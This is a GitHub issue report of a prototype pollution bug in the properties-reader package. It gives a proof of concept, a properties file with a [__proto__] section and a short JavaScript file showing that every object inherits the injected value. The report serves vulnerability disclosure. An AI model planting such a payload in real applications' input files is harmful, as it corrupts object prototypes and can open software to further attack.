Skip to content

Snyk - potential prototype pollution #40

@steveukx

Description

@steveukx

Steps to reproduce:

payload.properties

[__proto__]
polluted = polluted

poc.js:

var propertiesReader = require('properties-reader');

propertiesReader('./payload.properties');

console.log({}.polluted) // logs 'polluted'

Metadata

Metadata

Assignees

No one assigned

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions